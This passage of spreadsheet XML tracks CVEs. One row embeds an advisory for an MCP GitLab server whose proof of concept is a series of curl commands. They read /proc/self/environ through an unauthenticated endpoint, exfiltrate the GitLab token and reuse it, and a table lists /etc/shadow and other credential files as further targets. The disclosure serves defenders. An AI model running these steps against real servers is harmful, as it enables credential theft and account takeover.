      </c>
      <c r="O823" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P823" s="5" t="inlineStr"/>
      <c r="Q823" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R823" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an unauthorized code execution vulnerability in Enforce.</t>
        </is>
      </c>
      <c r="S823" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87088</t>
        </is>
      </c>
    </row>
    <row r="824">
      <c r="A824" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B824" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C824" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91097</t>
        </is>
      </c>
      <c r="D824" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E824" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F824" s="5" t="inlineStr">
        <is>
          <t>hp-security-alert@hp.com</t>
        </is>
      </c>
      <c r="G824" s="5" t="inlineStr"/>
      <c r="H824" s="5" t="inlineStr"/>
      <c r="I824" s="5" t="inlineStr"/>
      <c r="J824" s="5" t="inlineStr"/>
      <c r="K824" s="5" t="inlineStr"/>
      <c r="L824" s="5" t="inlineStr"/>
      <c r="M824" s="5" t="inlineStr"/>
      <c r="N824" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O824" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P824" s="5" t="inlineStr"/>
      <c r="Q824" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R824" s="5" t="inlineStr">
        <is>
          <t>HP has identified and remediated multiple externally reported vulnerabilities within HPLIP. The findings affect several software components that could potentially enable remote code execution, privilege escalation, denial of service, information disclosure, or unauthorized file modification under certain conditions.</t>
        </is>
      </c>
      <c r="S824" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91097</t>
        </is>
      </c>
    </row>
    <row r="825">
      <c r="A825" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B825" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C825" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61560</t>
        </is>
      </c>
      <c r="D825" s="5" t="inlineStr"/>
      <c r="E825" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F825" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G825" s="5" t="inlineStr"/>
      <c r="H825" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I825" s="5" t="inlineStr"/>
      <c r="J825" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K825" s="5" t="inlineStr"/>
      <c r="L825" s="5" t="inlineStr">
        <is>
          <t>npm:@zereight/mcp-gitlab</t>
        </is>
      </c>
      <c r="M825" s="5" t="inlineStr">
        <is>
          <t>2.1.27</t>
        </is>
      </c>
      <c r="N825" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O825" s="5" t="inlineStr"/>
      <c r="P825" s="5" t="inlineStr"/>
      <c r="Q825" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R825" s="5" t="inlineStr">
        <is>
          <t>### Summary
The SSE transport mode (`SSE=true`) exposes all MCP tools without any authentication. The `upload_markdown` tool reads arbitrary files from the server's local filesystem via an unsanitized `file_path` parameter and uploads them to a GitLab project. Combined, any unauthenticated network-reachable attacker can read `/proc/self/environ` to steal the server's `GITLAB_PERSONAL_ACCESS_TOKEN` and achieve full GitLab account takeover. This is the default configuration for Docker deployments.
### Details
Two issues chain together:
**1. No authentication on SSE transport (`src/index.ts:7350-7388`)**
When `SSE=true` (the intended mode for Docker deployments per `docker-compose.yaml`), the `/sse` and `/messages` endpoints have zero authentication middleware. Any HTTP client that can reach the port can establish a session and invoke all ~100+ tools using the server's configured PAT.
```typescript
// src/index.ts:7354 — no auth check
app.get("/sse", async (_: Request, res: Response) =&gt; {
    const serverInstance = createServer();
    const transport = new SSEServerTransport("/messages", res);
    await serverInstance.connect(transport);
});
```
Remote Authorization (`REMOTE_AUTHORIZATION=true`) is explicitly incompatible with SSE mode (`src/index.ts:1833-1839`), so there is no way to add per-request auth in this transport.
**2. Arbitrary file read in `upload_markdown` (`src/index.ts:5461-5503`)**
The `upload_markdown` tool calls `fs.readFileSync(filePath)` where `filePath` comes directly from user input with no validation. The Zod schema (`src/schemas.ts:2150-2153`) defines `file_path` as `z.string()` with no path restrictions, allowlists, or sandboxing.
```typescript
async function markdownUpload(projectId: string, filePath: string) {
    if (!fs.existsSync(filePath)) {
        throw new Error(`File not found: ${filePath}`);
    }
    const fileBuffer = fs.readFileSync(filePath);  // Arbitrary file read — no path validation
    // ... uploads to GitLab project via POST /projects/:id/uploads
}
```
This tool is in the `users` toolset, which is **enabled by default**.
**Docker amplification:** The `Dockerfile` has no `USER` directive, so the process runs as root. The `docker-compose.yaml` maps `3002:3002`, which binds `0.0.0.0` by default, exposing the unauthenticated endpoint to the network.
### PoC
**Prerequisites:**
- A running `@zereight/mcp-gitlab` instance with `SSE=true` and `GITLAB_PERSONAL_ACCESS_TOKEN` set (this is the default Docker deployment config)
- Network access to the server's port (default: 3002)
- A GitLab project ID the PAT has write access to (use `list_projects` to enumerate)
**Steps:**
```bash
# 1. Connect to the unauthenticated SSE endpoint and capture the session ID
SESSION_ID=$(curl -s -N http://&lt;HOST&gt;:3002/sse | head -1 | grep -oP 'sessionId=\K[^&amp;\s]+')
# 2. (Optional) Enumerate accessible projects to find a writable project ID
curl -X POST "http://&lt;HOST&gt;:3002/messages?sessionId=$SESSION_ID" \
  -H "Content-Type: application/json" \
  -d '{
    "jsonrpc": "2.0",
    "id": 1,
    "method": "tools/call",
    "params": {
      "name": "list_projects",
      "arguments": {"owned": true}
    }
  }'
# 3. Read /proc/self/environ (contains GITLAB_PERSONAL_ACCESS_TOKEN in plaintext)
#    and upload it to a GitLab project
curl -X POST "http://&lt;HOST&gt;:3002/messages?sessionId=$SESSION_ID" \
  -H "Content-Type: application/json" \
  -d '{
    "jsonrpc": "2.0",
    "id": 2,
    "method": "tools/call",
    "params": {
      "name": "upload_markdown",
      "arguments": {
        "project_id": "&lt;WRITABLE_PROJECT_ID&gt;",
        "file_path": "/proc/self/environ"
      }
    }
  }'
# 4. The response contains a GitLab upload URL like:
#    {"markdown": "![environ](/uploads/abc123def456/environ)", "url": "/uploads/abc123def456/environ"}
#
# 5. Retrieve the uploaded file from GitLab:
curl "https://gitlab.example.com/&lt;namespace&gt;/&lt;project&gt;/uploads/abc123def456/environ"
# 6. The file contains NUL-separated environment variables including:
#    GITLAB_PERSONAL_ACCESS_TOKEN=glpat-xxxxxxxxxxxxxxxxxxxx
#
# 7. Use the stolen PAT for full GitLab API access:
curl -H "Private-Token: glpat-xxxxxxxxxxxxxxxxxxxx" "https://gitlab.example.com/api/v4/user"
```
**Other exfiltrable targets (running as root in Docker):**
| File | Contents |
|---|---|
| `/proc/self/environ` | All env vars including `GITLAB_PERSONAL_ACCESS_TOKEN=glpat-xxxxx` |
| `/proc/self/cmdline` | Command line args (token if passed via CLI) |
| `/etc/shadow` | System password hashes |
| `/app/build/index.js` | Full application source code |
| `~/.gitlab-mcp-token.json` | OAuth tokens (if OAuth mode was used) |
### Impact
**Unauthenticated full GitLab account takeover.** Any attacker with network access to the MCP server port can steal the Personal Access Token and gain complete access to the GitLab instance as the token owner - including all repositories, CI/CD secrets and variables, deploy keys, project settings, and admin functions if the user has admin privileges. No credentials or user interaction are required. This is the default configuration for Docker deployments</t>
        </is>
      </c>
      <c r="S825" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61560</t>
        </is>
      </c>
    </row>
    <row r="826">
      <c r="A826" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B826" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C826" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81192</t>
        </is>
      </c>
      <c r="D826" s="5" t="inlineStr"/>
      <c r="E826" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F826" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G826" s="5" t="inlineStr"/>
      <c r="H826" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I826" s="5" t="inlineStr"/>
      <c r="J826" s="5" t="inlineStr"/>
      <c r="K826" s="5" t="inlineStr"/>
      <c r="L826" s="5" t="inlineStr">
        <is>
          <t>nuget:OpenTelemetry.Resources.Host</t>
        </is>
      </c>
      <c r="M826" s="5" t="inlineStr">
        <is>
          <t>1.16.0-beta.2</t>
        </is>
      </c>
      <c r="N826" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O826" s="5" t="inlineStr"/>
      <c r="P826" s="5" t="inlineStr"/>
      <c r="Q826" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="R826" s="5" t="inlineStr">
        <is>
          <t>### Summary
The `OpenTelemetry.Resources.Host` NuGet package is affected by an untrusted search path vulnerability on macOS. The `host.id` resource attribute detector launches the `sh` and `ioreg` executables by bare name rather than by absolute path, so both are resolved
through the `PATH` environment variable.
A local attacker who is less privileged than the host application, and who can influence `PATH` or write to a directory that appears in `PATH` ahead of the system directories, can have an arbitrary binary executed in the application's security context, resulting in local
code execution/privilege escalation.
### Details
The implementation of the host detector macOS has always invoked `ioreg` and `sh` via their bare names since it was implemented by [open-telemetry/opentelemetry-dotnet-contrib#1631](https://github.com/open-telemetry/opentelemetry-dotnet-contrib/pull/1631).
The vulnerability was fixed by [open-telemetry/opentelemetry-dotnet-contrib#4760](https://github.com/open-telemetry/opentelemetry-dotnet-contrib/pull/4760) which executes `ioreg` directly using its absolute path.
### Impact
Applications running on **macOS** that use the `OpenTelemetry.Resources.Host` detector when an attacker who is *less privileged* than the application process can influence `PATH` or write to a `PATH` directory that precedes the system directories (e.g. a higher-privileged service with a user-writable directory in its search path, or a process inheriting an attacker-influenced environment). The attacker gains code execution in the application's security context through an attacker-controlled `ioreg` executable.
### Mitigation
This vulnerability only affect macOS hosts - Linux and Windows hosts are unaffected.
### Workarounds
None known.
### References
- [GHSA-9h8m-3fm2-qjrq](https://github.com/open-telemetry/opentelemetry-go/security/advisories/GHSA-9h8m-3fm2-qjrq)
- [open-telemetry/opentelemetry-dotnet-contrib#4760](https://github.com/open-telemetry/opentelemetry-dotnet-contrib/pull/4760)
- [CWE-426](https://cwe.mitre.org/data/definitions/426.html)</t>
        </is>
      </c>
      <c r="S826" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81192</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:S826"/>
  <conditionalFormatting sqref="E2:E826">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826">
    <cfRule type="cellIs" priority="5" operator="equal" dxfId="4">
      <formula>"Yes"</formula>
    </cfRule>
  </conditionalFormatting>
  <hyperlinks>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2" r:id="rId1"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S3" r:id="rId2"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S4" r:id="rId3"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S5" r:id="rId4"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S6" r:id="rId5"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S7" r:id="rId6"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S8" r:id="rId7"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S9" r:id="rId8"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S10" r:id="rId9"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S11" r:id="rId10"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S12" r:id="rId11"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S13" r:id="rId12"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S14" r:id="rId13"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S15" r:id="rId14"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S16" r:id="rId15"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S17" r:id="rId16"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S18" r:id="rId17"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S19" r:id="rId18"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S20" r:id="rId19"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S21" r:id="rId20"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S22" r:id="rId21"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S23" r:id="rId22"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S24" r:id="rId23"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S25" r:id="rId24"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S26" r:id="rId25"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S27" r:id="rId26"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S28" r:id="rId27"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S29" r:id="rId28"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S30" r:id="rId29"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S31" r:id="rId30"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S32" r:id="rId31"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S33" r:id="rId32"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S34" r:id="rId33"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S35" r:id="rId34"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S36" r:id="rId35"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S37" r:id="rId36"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S38" r:id="rId37"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S39" r:id="rId38"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S40" r:id="rId39"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S41" r:id="rId40"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S42" r:id="rId41"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S43" r:id="rId42"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S44" r:id="rId43"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S45" r:id="rId44"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S46" r:id="rId45"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S47" r:id="rId46"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S48" r:id="rId47"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S49" r:id="rId48"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S50" r:id="rId49"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S51" r:id="rId50"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S52" r:id="rId51"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S53" r:id="rId52"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S54" r:id="rId53"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S55" r:id="rId54"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S56" r:id="rId55"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S57" r:id="rId56"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S58" r:id="rId57"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S59" r:id="rId58"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S60" r:id="rId59"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S61" r:id="rId60"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S62" r:id="rId61"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S63" r:id="rId62"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S64" r:id="rId63"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S65" r:id="rId64"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S66" r:id="rId65"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S67" r:id="rId66"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S68" r:id="rId67"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S69" r:id="rId68"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S70" r:id="rId69"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S71" r:id="rId70"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S72" r:id="rId71"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S73" r:id="rId72"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S74" r:id="rId73"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S75" r:id="rId74"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S76" r:id="rId75"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S77" r:id="rId76"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S78" r:id="rId77"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S79" r:id="rId78"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S80" r:id="rId79"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S81" r:id="rId80"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S82" r:id="rId81"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S83" r:id="rId82"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S84" r:id="rId83"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S85" r:id="rId84"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S86" r:id="rId85"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S87" r:id="rId86"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S88" r:id="rId87"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S89" r:id="rId88"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S90" r:id="rId89"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S91" r:id="rId90"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S92" r:id="rId91"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S93" r:id="rId92"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S94" r:id="rId93"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S95" r:id="rId94"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S96" r:id="rId95"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S97" r:id="rId96"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S98" r:id="rId97"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S99" r:id="rId98"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S100" r:id="rId99"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S101" r:id="rId100"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S102" r:id="rId101"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S103" r:id="rId102"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S104" r:id="rId103"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S105" r:id="rId104"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S106" r:id="rId105"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S107" r:id="rId106"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S108" r:id="rId107"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S109" r:id="rId108"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S110" r:id="rId109"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S111" r:id="rId110"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S112" r:id="rId111"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S113" r:id="rId112"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S114" r:id="rId113"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S115" r:id="rId114"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S116" r:id="rId115"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S117" r:id="rId116"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S118" r:id="rId117"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S119" r:id="rId118"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S120" r:id="rId119"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S121" r:id="rId120"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S122" r:id="rId121"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S123" r:id="rId122"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S124" r:id="rId123"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S125" r:id="rId124"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S126" r:id="rId125"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S127" r:id="rId126"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S128" r:id="rId127"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S129" r:id="rId128"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S130" r:id="rId129"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S131" r:id="rId130"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S132" r:id="rId131"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S133" r:id="rId132"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S134" r:id="rId133"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S135" r:id="rId134"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S136" r:id="rId135"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S137" r:id="rId136"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S138" r:id="rId137"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S139" r:id="rId138"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S140" r:id="rId139"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S141" r:id="rId140"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S142" r:id="rId141"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S143" r:id="rId142"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S144" r:id="rId143"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S145" r:id="rId144"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S146" r:id="rId145"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S147" r:id="rId146"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S148" r:id="rId147"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S149" r:id="rId148"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S150" r:id="rId149"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S151" r:id="rId150"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S152" r:id="rId151"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S153" r:id="rId152"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S154" r:id="rId153"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S155" r:id="rId154"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S156" r:id="rId155"/>
